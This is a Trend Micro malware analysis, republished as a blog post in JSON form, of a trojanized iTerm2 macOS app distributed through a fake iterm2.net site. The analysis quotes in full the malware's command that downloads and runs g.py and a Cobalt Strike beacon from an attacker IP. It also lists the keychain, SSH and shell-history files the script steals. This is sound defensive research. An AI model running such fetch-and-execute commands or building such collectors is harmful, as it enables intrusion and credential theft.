{"id":43144,"date":"2021-09-30T00:00:00","date_gmt":"2021-09-30T00:00:00","guid":{"rendered":"https:\/\/www.trendmicro.com\/en_us\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app.html"},"modified":"2021-09-30T00:00:00","modified_gmt":"2021-09-30T00:00:00","slug":"mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/","title":{"rendered":"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20banner.jpg\"> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"49.721962616822\"> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"44499974\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"9.7329376854599\">\n<div class=\"article-details\" role=\"heading\" readability=\"38.93175074184\"> <span 
class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__description\">We go into more detail about a fake version of the iTerm2 app that downloads and runs malware, detected by Trend Micro as TrojanSpy.Python.ZURU.A, which collects private data from a victim\u2019s machine.<\/p>\n<p class=\"article-details__author-by\">By: Steven Du, Luis Magisa <time class=\"article-details__date\">September 30, 2021<\/time> <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"32.190476190476\">\n<div readability=\"15.201058201058\">\n<p>Earlier this month, <a href=\"https:\/\/zhuanlan.zhihu.com\/p\/408746101\" target=\"_blank\" rel=\"noopener\">a user on Chinese question-and-answer website Zhihu reported<\/a> that a search engine result for the keyword \u201ciTerm2\u201d led to a fake website, <i>iterm2.net<\/i>, that mimics the legitimate <i>iterm2.com<\/i> (Figure 1). A fake version of the iTerm2 app, a macOS terminal emulator, can be downloaded from a link found on <i>iterm2.net<\/i>. When this app is executed, it downloads and runs <i>g.py<\/i>, a malicious Python script fetched from 47[.]75[.]123[.]111. This malware, which Trend Micro detects as TrojanSpy.Python.ZURU.A, collects private data from the victim\u2019s machine.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2001.png\" alt=\"Figure 1. The fraudulent website iterm2.net\"><figcaption>Figure 1. 
The fraudulent website iterm2.net<\/figcaption><\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"39.675763182239\">\n<div readability=\"25.470860314524\">\n<p>Objective-See previously <a href=\"https:\/\/objective-see.com\/blog\/blog_0x66.html\" target=\"_blank\" rel=\"noopener\">published a blog entry<\/a> about this malware, which analyzed how the threat actor repacks the iTerm2 app to load the malicious <i>libcrypto.2.dylib<\/i>. This library, in turn, downloads and runs other components, including the aforementioned <i>g.py<\/i> script and a Mach-O file called \u201cGoogleUpdate\u201d that contains a Cobalt Strike beacon payload. This blog entry covers the malware\u2019s details.<\/p>\n<h2><span class=\"body-subhead-title\">The trojanized app<\/span><\/h2>\n<p>As of September 15, <i>iterm2.net<\/i> is still active. However, the malicious file is not hosted on this website directly. Instead, the website contains a link, <i>hxxp:\/\/www.kaidingle.com\/iTerm\/iTerm.dmg<\/i>, from which users can download a macOS disk image file (DMG) called <i>iTerm.dmg<\/i>. The user is redirected to this download URL for <i>iTerm.dmg<\/i> regardless of which app version the user selects to download from the fake website; the real <i>iterm2.com<\/i> website has different URLs and files for the various versions. The files downloaded from the legitimate website come in ZIP format, as opposed to the DMG file from the fraudulent website, as shown in Figure 2.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2002-2.png\" alt=\"Figure 2. The file downloaded from the fake website (left) and the official website (right)\"><figcaption>Figure 2. 
The file downloaded from the fake website (left) and the official website (right)<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p>Comparing the folder structure of the DMG and ZIP files shows numerous differences between them:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">All the Mach-O files in the trojanized iTerm2 app were signed with an Apple Distribution certificate, as shown in Figure 3, whereas files in the legitimate iTerm2.app are code signed with a Developer ID Application certificate. According to Apple documentation, an Apple Distribution certificate is only used to sign an app before the developer delivers it to the App Store, so apps downloaded from the App Store generally don\u2019t have an Apple Distribution certificate.<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2003.png\" alt=\"Figure 3. Trojanized iTerm2 app code signing\"><figcaption>Figure 3. Trojanized iTerm2 app code signing<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ul>\n<li><span class=\"rte-red-bullet\">The trojanized iTerm2 app contains a file called <i>libcrypto.2.dylib<\/i> (with a SHA-256 hash of 2c269ff4216dc6a14fd81ffe541994531b23a1d8e0fbd75b9316a9fa0e0d5fef) in its Frameworks folder, which does not exist in the legitimate version, as shown in Figure 4.<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2004.png\" alt=\"Figure 4. 
The libcrypto.2.dylib file added in the trojanized iTerm2 app\"><figcaption>Figure 4. The libcrypto.2.dylib file added in the trojanized iTerm2 app<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ul>\n<li><span class=\"rte-red-bullet\">In the trojanized iTerm2 app, the main Mach-O file has an additional load command, <i>LC_LOAD_DYLIB<\/i>, that loads the <i>libcrypto.2.dylib<\/i> file, as shown in Figure 5.<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2005.png\" alt=\"Figure 5. The load command LC_LOAD_DYLIB loads the file libcrypto.2.dylib\"><figcaption>Figure 5. The load command LC_LOAD_DYLIB loads the file libcrypto.2.dylib<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"41\">\n<div class=\"responsive-table-wrap\" readability=\"27\">\n<p>According to Objective-See\u2019s blog post, the malicious code contained in the <i>libcrypto.2.dylib<\/i> file is executed automatically when the victim runs the trojanized iTerm2 app. 
This is a clever method for repacking legitimate apps that we have not seen before.<\/p>\n<p>Once executed, the malware connects to its server and receives the following command from it:<\/p>\n<p><i>&#8220;curl -sfo \/tmp\/g.py http:\/\/47[.]75[.]123[.]111\/g.py &amp;&amp; chmod 777 \/tmp\/g.py &amp;&amp; python \/tmp\/g.py &amp;&amp; curl -sfo \/tmp\/GoogleUpdate http:\/\/47[.]75[.]123[.]111\/GoogleUpdate &amp;&amp; chmod 777 \/tmp\/GoogleUpdate &amp;&amp; \/tmp\/GoogleUpdate&#8221;<\/i><\/p>\n<p>The command carries out these steps:<\/p>\n<ol>\n<li>Download the <i>g.py<\/i> script to <i>\/tmp\/g.py<\/i> and execute it<\/li>\n<li>Download \u201cGoogleUpdate\u201d to <i>\/tmp\/GoogleUpdate<\/i> and execute it<\/li>\n<li>Collect data using the <i>g.py<\/i> script<\/li>\n<\/ol>\n<p>The Python script <i>g.py<\/i> collects the following system data and files from the victim\u2019s machine and sends them to the server:<\/p>\n<ol>\n<li>Operating system information<\/li>\n<li>Username<\/li>\n<li>Installed applications<\/li>\n<li>Local IP address<\/li>\n<li>Copies of these files and folders:\n<ol>\n<li><i>~\/.bash_history<\/i><\/li>\n<li><i>~\/.zsh_history<\/i><\/li>\n<li><i>~\/.gitConfig<\/i><\/li>\n<li><i>\/etc\/hosts<\/i><\/li>\n<li><i>~\/.ssh<\/i><\/li>\n<li><i>~\/.zhHistory<\/i><\/li>\n<li><i>~\/Library\/Keychains\/Login.keychain-db<\/i><\/li>\n<li><i>~\/Library\/Application Support\/VanDyke\/SecureCRT\/Config\/<\/i><\/li>\n<li><i>~\/Library\/Application Support\/iTerm2\/SavedState\/<\/i><\/li>\n<\/ol>\n<\/li>\n<li>The contents of these directories:\n<ol>\n<li><i>~\/<\/i> (the current user\u2019s home directory)<\/li>\n<li><i>~\/Desktop<\/i><\/li>\n<li><i>~\/Documents<\/i><\/li>\n<li><i>~\/Downloads<\/i><\/li>\n<li><i>\/Applications<\/i><\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<h2><span class=\"body-subhead-title\">Other trojanized apps and fake sites<\/span><\/h2>\n<p>Further analysis of the trojanized iTerm2 app\u2019s Apple Distribution certificate led us to find similar 
trojanized apps on VirusTotal (Table 1), all of which were trojanized using the same method.<\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\">\n<caption>Table 1. Other trojanized apps found on VirusTotal<\/caption>\n<tbody readability=\"7\">\n<tr>\n<td><b>File Name<\/b><\/td>\n<td><b>SHA-256 Hash<\/b><\/td>\n<td><b>Detection<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><i>iTerm.app.zip<\/i><\/td>\n<td>5f59ead37fa836c6329a7ba3edd4afc9a2c5fec61de4e0cdb8e8a41031ae4db0<\/td>\n<td>TrojanSpy.MacOS.ZURU.A<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><i>SecureCRT.dmg<\/i><\/td>\n<td>ae0510032cd4699ef17de7ed1587918ffcd7ff7c9a77fc45f9d68effe2934132<\/td>\n<td>Trojan.MacOS.ZuRu.PFH<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><i>SecureCRT.dmg<\/i><\/td>\n<td>1e462f8716275dbae6acb3ff4f7a95624c1afb23c5069fa42a14ed49c2588921<\/td>\n<td>Trojan.MacOS.ZuRu.PFH<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><i>Microsoft Remote Desktop.dmg<\/i><\/td>\n<td>5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259<\/td>\n<td>TrojanSpy.MacOS.ZURU.A<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><i>Navicat15_cn.dmg<\/i><\/td>\n<td>6df91af12c87874780cc9d49e700161e1ead71ae045954adbe7633ec9e5e45ff<\/td>\n<td>TrojanSpy.MacOS.ZURU.A<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><i>Navicat15_cn.dmg<\/i><\/td>\n<td>91541cfc0474d6c06376460759517ae94f36fca74d5ab84cf5c23d98bd33939e<\/td>\n<td>TrojanSpy.MacOS.ZURU.A<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Searching VirusTotal for the Secure Sockets Layer (SSL) thumbprint that <i>iterm2.net <\/i>used revealed several other fraudulent websites. 
As shown in Figure 6, all of these websites resolved to the same IP address, 43[.]129[.]218[.]115.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2006.png\" alt=\"Figure 6. Other fake websites found on VirusTotal\"><figcaption>Figure 6. Other fake websites found on VirusTotal<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>We were able to access one of these fake websites, <i>snailsvn.cn<\/i>, but the download link on its page was empty at that time, so it remains uncertain whether this website had been used to distribute a trojanized version of SnailSVN, an Apache Subversion (SVN) client for Mac OS X, in the wild (Figure 7). All of these domains were inaccessible at the time of writing.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2007.png\" alt=\"Figure 7. The fake SnailSVN website\"><figcaption>Figure 7. The fake SnailSVN website<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<h2><span class=\"body-subhead-title\">Download server<\/span><\/h2>\n<p>The server used for hosting the trojanized packages, <i>kaidingle[.]com<\/i>, was registered on September 7 and is currently still active. According to VirusTotal, apart from <i>iTerm.dmg<\/i>, it also hosts other DMG files such as <i>SecureCRT.dmg<\/i> and <i>Navicat15_cn.dmg<\/i> (Figure 8). 
As of September 18, the latter two DMG files can still be downloaded from the server.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2008.png\" alt=\"Figure 8. URLs related to the download server\"><figcaption>Figure 8. URLs related to the download server<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>Based on the domain\u2019s WHOIS record (WHOIS is a query and response protocol for registration data), there are four other domains under the same registrant (Figure 9). However, so far, none of these domains show any indication that they\u2019re related to any malware.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2009.png\" alt=\"Figure 9. Other domains from the same registrant\"><figcaption>Figure 9. 
Other domains from the same registrant<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<h2><span class=\"body-subhead-title\">Second-stage server<\/span><\/h2>\n<p>VirusTotal recorded multiple URLs related to a second-stage server under the IP address 47[.]75[.]123[.]111 \u2013 the same address as that of the malicious <i>g.py<\/i> script \u2013 from September 8 to 17, as shown in Figure 10.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2010.png\" alt=\"Figure 10. URLs under the second-stage server\"><figcaption>Figure 10. URLs under the second-stage server<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.06012884753\">\n<div class=\"responsive-table-wrap\" readability=\"17.490336435218\">\n<p>Besides the <i>g.py<\/i> script and \u201cGoogleUpdate\u201d components that are part of the trojanized iTerm app malware routine, the second-stage server also hosts four other Mach-O files that are used as post-penetration tools (Table 2).<\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\">\n<caption>Table 2. 
Other Mach-O files hosted on the second-stage server<\/caption>\n<tbody readability=\"7.5769230769231\">\n<tr>\n<td><b>File Name<\/b><\/td>\n<td><b>SHA-256 Hash<\/b><\/td>\n<td><b>Description\/Detection<\/b><\/td>\n<\/tr>\n<tr readability=\"4.7547169811321\">\n<td>la<\/td>\n<td>79ef23214c61228a03faea00a1859509ea3bf0247219d65ae6de335fde4061f5<\/td>\n<td readability=\"4.4044943820225\">\n<p>An open source intranet penetration scanner framework<\/p>\n<p><u>(<a href=\"https:\/\/github.com\/k8gege\/LadonGo\">https:\/\/github.com\/k8gege\/LadonGo<\/a>)<\/u><\/p>\n<\/td>\n<\/tr>\n<tr readability=\"4.6216216216216\">\n<td>iox<\/td>\n<td>f005ea1db6da3f56e4c8b1135218b1da56363b077d3be7d218d8284444d7824f<\/td>\n<td readability=\"3.9873417721519\">\n<p>A port forwarding and intranet proxy tool<\/p>\n<p>(<a href=\"https:\/\/github.com\/EddieIvan01\/iox\">https:\/\/github.com\/EddieIvan01\/iox<\/a>)<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"7.4223107569721\">\n<td>netscan-darwin-amd64<\/td>\n<td>d12ef7f6de48c09e84143e90fe4a4e7b1b3d10cee5cd721f7fdf61e62e08e749<\/td>\n<td readability=\"6.5705521472393\">\n<p>Netscan scans a network for ports that are open on an IP address or IP range, and for IP addresses that are in use on that network<\/p>\n<p>(<a href=\"https:\/\/github.com\/jessfraz\/netscan\/releases\">https:\/\/github.com\/jessfraz\/netscan\/releases<\/a>)<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td>Host<\/td>\n<td>a83edc0eb5a2f1db62acfa60c666b5a5c53733233ce264702a16cb5220df9d4e<\/td>\n<td>Backdoor.MacOS.Wirenet.PFH<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Notably, the IP address of the second-stage server is in the same address range as the one \u201cGoogleUpdate\u201d connects to, which is 47[.]75[.]96[.]198. Both of these IP addresses are hosted by Alibaba Hong Kong. 
As shown in Figure 11, the URLs under 47[.]75[.]96[.]198 were recorded around the same time as those on the second-stage server, which suggests that the two servers may have been set up by the same threat actor.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2011.png\" alt=\"Figure 11. URLs under the same server as \u201cGoogleUpdate\u201d\"><figcaption>Figure 11. URLs under the same server as \u201cGoogleUpdate\u201d<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<h2><span class=\"body-subhead-title\">Advertisement sites<\/span><\/h2>\n<p>As detailed in the aforementioned user report, the first item in the search engine results is under the subdomain <i>rjxz.jxhwst.top<\/i>. Searching Google for this address returns two results that lead only to cached copies of the pages (Figure 12); as of this writing, the actual pages are already down.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2012.png\" alt=\"Figure 12. Google caches of the two fake sites\"><figcaption>Figure 12. 
Google caches of the two fake sites<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>The first search result, titled \u201cMicrosoft Remote Desktop,\u201d points to <i>hxxp:\/\/rjxz.jxhwst.top\/3<\/i>, but its cache (Figure 13) and source code (Figure 14) show that it redirected visitors to a fake website, <i>hxxp:\/\/remotedesktop.vip<\/i>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2013.png\" alt=\"Figure 13. The cache of the fake \u201cMicrosoft Remote Desktop\u201d page\"><figcaption>Figure 13. The cache of the fake \u201cMicrosoft Remote Desktop\u201d page<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2014.png\" alt=\"Figure 14. The source code of the fake page\"><figcaption>Figure 14. The source code of the fake page<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p>Upon checking its main page, we discovered that the second-level domain <i>jxhwst.top<\/i> belongs to an agriculture company in northern China. Apart from the subdomain <i>rjxz.jxhwst.top<\/i>, this second-level domain has 44 other subdomains, almost all of which are used for advertisements that have no relation to the agriculture company (Figure 15). It is possible that the company rents out these subdomains to others for advertising purposes but cannot prevent them from being abused for illegal purposes. 
If this is the case, the threat actor rents the subdomain for malware distribution.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2015.png\" alt=\"Figure 15. The subdomains of the agriculture company\"><figcaption>Figure 15. The subdomains of the agriculture company<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.649159663866\">\n<div readability=\"12.843137254902\">\n<h2><span class=\"body-subhead-title\">Security recommendations<\/span><\/h2>\n<p>To protect systems from threats like these, end users should only download apps from official and legitimate marketplaces. They should be careful about the search results from search engines, and always double-check URLs to make sure these really point to the official sites. Mac users can consider multilayered security solutions such as <a href=\"https:\/\/www.trendmicro.com\/en_us\/forHome\/products\/antivirus-for-mac.html\" target=\"_blank\" rel=\"noopener\">Trend Micro Antivirus for Mac\u00ae<\/a>, which provides enhanced anti-scam protection that flags and blocks scam websites that attempt to steal their personal data. 
They may also avail of Antivirus for Mac as part of <a href=\"https:\/\/www.trendmicro.com\/en_us\/forHome\/products\/maximum-security.html\" target=\"_blank\" rel=\"noopener\">Trend Micro Maximum Security<\/a>, a multi-platform solution that offers comprehensive security and multidevice protection against cyberthreats.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<h2><span class=\"body-subhead-title\">Indicators of Compromise (IOCs)<\/span><\/h2>\n<\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"21.940928270042\">\n<div class=\"responsive-table-wrap\" readability=\"6.1708860759494\">\n<p><span class=\"body-subhead-title\">MITRE Tactics, Techniques, and Procedures 
(TTPs)<\/span><\/p>\n<\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <\/body> <\/p>\n","protected":false},"excerpt":{"rendered":"<p>We go into more detail about a fake version of the iTerm2 app that downloads and runs malware, detected by Trend Micro as TrojanSpy.Python.ZURU.A, which collects private data from a victim\u2019s machine. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":43145,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9513,9509,9535],"class_list":["post-43144","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-malware","tag-trend-micro-research-research","tag-trend-micro-research-web"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.7 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2021-09-30T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/09\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1376\" \/>\n\t<meta property=\"og:image:height\" content=\"968\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst\",\"datePublished\":\"2021-09-30T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/\"},\"wordCount\":2151,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/09\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Research\",\"Trend Micro Research : Web\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\\\/\",\"name\":\"Mac Users Targeted by Trojanized iTerm2 App 
